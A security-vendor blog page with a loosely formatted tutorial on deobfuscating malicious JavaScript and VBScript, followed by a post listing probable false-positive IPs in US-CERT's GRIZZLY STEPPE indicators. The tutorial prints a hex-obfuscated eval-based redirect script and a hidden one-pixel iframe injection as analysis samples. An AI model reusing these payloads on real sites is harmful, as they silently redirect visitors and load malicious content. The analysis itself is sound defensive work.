Skip navigation
All Places > Products > RSA NetWitness Platform > Blog > 2016 > December > 31

<Mozilla>

1.The sample.html file to add the debugger; statement in the beginning of the script

2.load script.html into Firefox using the browser's File 

3.Use Firebug to set a breakpoint on the eval (txt); line of the script.

4.look at contents of the variable "txt"by typingthe console.log(txt) command in Firebug's Console tab.

5.Examine the deobfuscated script in the Console tab

 

 

1.The sample.html file to add the debugger; statement in the beginning of the script

2.load script.html into Firefox using the browser's File 

 

--sample.html-

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="keywords" content="#KEYWORDS#" />
<link rel="copyright" href="http://www.gnu.org/copyleft/fdl.html" />
<title>...Berlin with the appointed export lotus notes address book of...</title>
<script>

debugger;
var arr =

"76617220726566203d20646f63756d656e742e72656665727265723b0d0a766172206c6f63203d20646f63756d656e742e6c6f636174696f6e2e687265663b0d0a696620287265662e696e6465784f662822676f6f676c652229203d3d202d31202626207265662e696e6465784f6628227961686f6f2229203d3d202d31202626207265662e696e6465784f6628226d736e2229203d3d202d3129207b0d0a09646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f61637469766566726565686f73742e636f6d2f72656d6f7665642e7068703f75726c3d22202b206c6f633b0d0a7d20656c7365207b0d0a09696620287265662e696e6465784f662822736974653a2229203e3d2030207c7c207265662e696e6465784f662822736974652533412229203e3d203029207b0d0a0909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f61637469766566726565686f73742e636f6d2f72656d6f7665642e7068703f75726c3d22202b206c6f633b0d0a097d20656c7365207b0d0a0909766172207265203d206e6577205265674578702822687474703a5c2f5c2f285b612d7a302d395c2d412d5a5c2e5d2a295c2f22293b0d0a090976617220646f6d61696e203d2072652e65786563286c6f63293b0d0a090969662028646f6d61696e203d3d206e756c6c29207b0d0a090909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f61637469766566726565686f73742e636f6d2f72656d6f7665642e7068703f75726c3d22202b206c6f633b0d0a09097d20656c7365207b0d0a0909097265203d206e65772052656745787028225c5c2e285b612d7a302d395c2d412d5a5c2e5d2a2922293b0d0a090909746f70646f6d61696e203d2072652e6578656328646f6d61696e5b315d293b0d0a090909696620287265662e696e6465784f6628646f6d61696e5b315d2920213d202d31207c7c207265662e696e6465784f6628746f70646f6d61696e5b315d2920213d202d3129207b0d0a09090909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f61637469766566726565686f73742e636f6d2f72656d6f7665642e7068703f75726c3d22202b206c6f633b0d0a0909097d20656c7365207b0d0a090909097265203d206e6577205265674578702822713d5b5e265d2a22293b0d0a09090909766172206d203d2072652e6578656328726566293b0d0a09090909696620286d203d3d206e756c6c29207b0d0a09090909097265203d206e6577205265674578702822703d5b5e265d2a22293b0d0a09090909096d203d2072652e6578656328726566293b0d0a0909090909696620286d203d3d206e756c6c29207b0d0a090909090909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f61637469766566726565686f73742e636f6d2f72656d6f7665642e7068703f75726c3d22202b206c6f633b0d0a09090909097d20656c7365207b0d0a0909090909097661722071203d206d5b305d2e737562737472696e672832293b0d0a09090909090971203d20712e7265706c616365282f5c2b2f2c20225f22293b0d0a09090909090971203d20712e7265706c616365282f5c732f2c20225f22293b0d0a090909090909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f73747570686f6d652e636f6d2f702f22202b2071202b20222e68746d6c223b0d0a09090909097d0d0a090909097d20656c7365207b0d0a09090909097661722071203d206d5b305d2e737562737472696e672832293b0d0a090909090971203d20712e7265706c616365282f5c2b2f2c20225f22293b0d0a090909090971203d20712e7265706c616365282f5c732f2c20225f22293b0d0a0909090909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f73747570686f6d652e636f6d2f702f22202b2071202b20222e68746d6c223b0d0a090909097d0d0a0909097d0d0a09097d0d0a097d0d0a7d0d0a";

  • var table = new Array();table['0'] = 0;table['1'] = 1;table['2'] = 2;table['3'] = 3;table['4'] = 4;table['5'] = 5;table['6'] = 6;table['7'] = 7;table['8'] = 8;table['9'] = 9;table['a'] = 10;table['b'] = 11;table['c'] = 12;table['d'] = 13;table['e'] = 14;table['f'] = 15;function markCounter(a) { 

    var txt = ""; var c = 0; 

    while (c < a.length) {txt += String.fromCharCode(table[a[c]] * 16 + table[a[c + 1]]); c += 2;} 

    eval(txt);

    →3. to set a breakpoint on the eval (txt); line of the script.

 

 

4.look at contents of the variable "txt"by typingthe console.log(txt) command in Firebug's Console tab.

5.Examine the deobfuscated script in the Console tab

 

 

A***freehost.com

URL, Which is probably malicious.

 

---------------------------------------------------------------------------------------------------------------------------------------------------------

<IE>

 

  1. Edit sample.html in Notepad++ to insert the "debugger;" statement in the beginning of its script.
  2. Open sample.html in Internet Explorer and activate the debugger in Developer Tools.
  3. Reload the script in Internet Explorer to activate the debugger.
  4. Set a breakpoint using the Internet Explorer debugger on the third instance of document. write.
  5. Run the script in the Internet Explorer debugger to deobfuscate its contents and reach the breakpoint.
  6. Copy contents of the variable G82B54 to the clipboard and paste them into Notepad++
  7. Examine the deobfuscated script in Notepad++an d then exit Internet Explorer and the text editor

 

 

 

1.Edit sample.html in Notepad++ to insert the "debugger;" statement in the beginning of its script.

 

 

 

 

2.Open sample.html in Internet Explorer and activate the debugger in Developer Tools.

 

3.Reload the script in Internet Explorer to activate the debugger.

 

 

4.Set a breakpoint using the Internet Explorer debugger on the third instance of document. write.

 

5.Run the script in the Internet Explorer debugger to deobfuscate its contents and reach the breakpoint.

6.Copy contents of the variable G82B54 to the clipboard and paste them into Notepad+

 

 

 

 

7.Examine the deobfuscated script in Notepad++,an d then exit Internet Explorer and the text editor

URL is Malicious Site.

G82B54 "</textarea><iframe src=\http://66.109.***.198/c76c1d2643c69857e1a677d2e0f23f8e/b1fd046f3c05b517d106b003853b1441?p=ftp\ width=1 height=1 style=\"border: 0px\"></iframe>"

 

--------------------------------------------------------------------------------------------------------------------------------------------VBscript

Using the Cscript Interpreter

 

1.Right-click vbscript.vbs and select Edit with Notepad++.A dd the following code in the beginning of the file,
2.redefining the execute function so that instead of executing its argument,

 

Function execute(x)
SCript.Echo(x)
End Function

 

 

 

 

cscript > vbscript.vbs > out.txt

read out.txt

 

 

1390***.cn URl is Malicious Site.

Michael Sconzo

Threat: GRIZZLY STEPPE

Posted by Michael Sconzo Employee Dec 30, 2016

The FirstWatch team is constantly tracking various threats and threat actors. As part of their diligence they monitor 3rd parties for various bulletins and reports. US-Cert recently issued a report detailing an intrusion into a political organization believed to have originated from a Nation-State attacker. This attacker named 'GRIZZLY STEPPE' is the subject of a Joint Analysis Report (JAR) between DHS and DNI. The report can be found here: https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity

 

Additionally US-CERT has published an intrusion set that contains network indicators of compromise (IOCs) for said attack. RSA has added these indicators into the NetWitness Live platform (via Feeds) the said indicators can be located in NetWitness with the following custom pivot:

threat.source = “third party publicized iocs” && threat.category = “us-cert”

 

That said, some of the indicators as published are problematic, as they contain legitimate IPs that we believe to be benign triggers. We've identified the following IPs (at the minimum) as potential false positive indicators:

Twitter:
199.59.148.23
Yahoo:
98.138.199.240
66.196.116.112
98.138.79.73
72.30.196.161
Akamai:
104.93.2.201
Google:
216.58.216.174
216.58.216.142
Microsoft:
134.170.108.26
65.55.252.43

 

.Edu OWA Server:
134.121.241.31

 

TOR EXIT NODES:
5.149.254.114
185.100.86.122
203.218.5.241
207.176.226.8
74.208.191.202
185.13.76.45
5.28.62.85
5.135.158.101
5.196.1.129
5.249.145.164
35.0.127.52
37.220.35.202
45.33.48.204
46.28.68.158
46.165.223.217
46.165.230.5
46.182.106.190
51.255.33.0
51.255.202.66
62.210.129.246
64.113.32.29
69.162.139.9
79.172.193.32
80.240.139.111
85.143.219.211
88.198.14.171
89.31.57.5
89.163.237.45
89.187.142.208
89.187.144.122
91.121.230.209
91.146.121.3
91.213.8.84
91.213.8.236
91.219.236.218
91.228.151.52
92.222.6.12
92.222.103.234
93.174.90.30
93.184.66.227
94.102.49.175
94.142.242.84
95.130.11.147
106.187.37.101
107.181.174.84
107.182.131.117
108.166.168.158
109.74.151.149
109.163.234.5
109.163.234.8
128.52.128.105
128.153.145.125
146.185.177.103
148.251.255.92
149.56.223.241
149.56.229.17
158.130.0.242
162.247.72.27
162.247.72.199
162.247.72.200
162.247.72.201
162.247.72.202
162.247.72.216
162.247.72.217
162.247.73.204
162.247.73.206
163.172.135.172
163.172.136.101
163.172.209.46
171.25.193.20
171.25.193.25
171.25.193.77
171.25.193.78
171.25.193.132
171.25.193.235
173.254.216.66
176.10.104.243
176.10.107.180
176.31.7.241
176.58.100.98
178.17.170.124
178.17.170.164
178.17.174.10
178.17.174.99
178.32.53.94
178.175.131.194
178.217.187.39
178.239.167.15
185.11.180.67
185.17.184.228
185.34.33.2
185.36.100.145
185.38.14.171
185.38.14.215
185.69.168.112
185.129.62.62
185.129.62.63
188.126.81.155
193.90.12.86
193.90.12.87
193.90.12.88
193.90.12.89
193.90.12.90
193.111.136.162
195.154.8.111
195.154.90.122
198.50.200.135
198.58.107.53
198.96.155.3
199.87.154.251
199.87.154.255
199.127.226.150
204.11.50.131
204.85.191.30
209.133.66.214
209.249.180.198
212.117.180.130
216.239.90.19
217.12.204.104
217.13.197.5
217.115.10.131
217.115.10.132
109.163.234.2
141.138.141.208
178.17.170.201
185.128.40.220
198.50.200.131
204.194.29.4
207.244.97.183
209.222.77.220
23.239.10.144
64.137.178.3
71.19.157.127
89.187.145.103
94.242.57.2

Hits to any GRIZZLY STEPPE indicators should warrant additional investigation but hits to the above IP addresses should include the expectation of being false positives. None of these indicators have been removed from the feed since we don't want to alter 3rd party information and cause potentially useful context to be absent. 

Filter Blog

By date: By tag: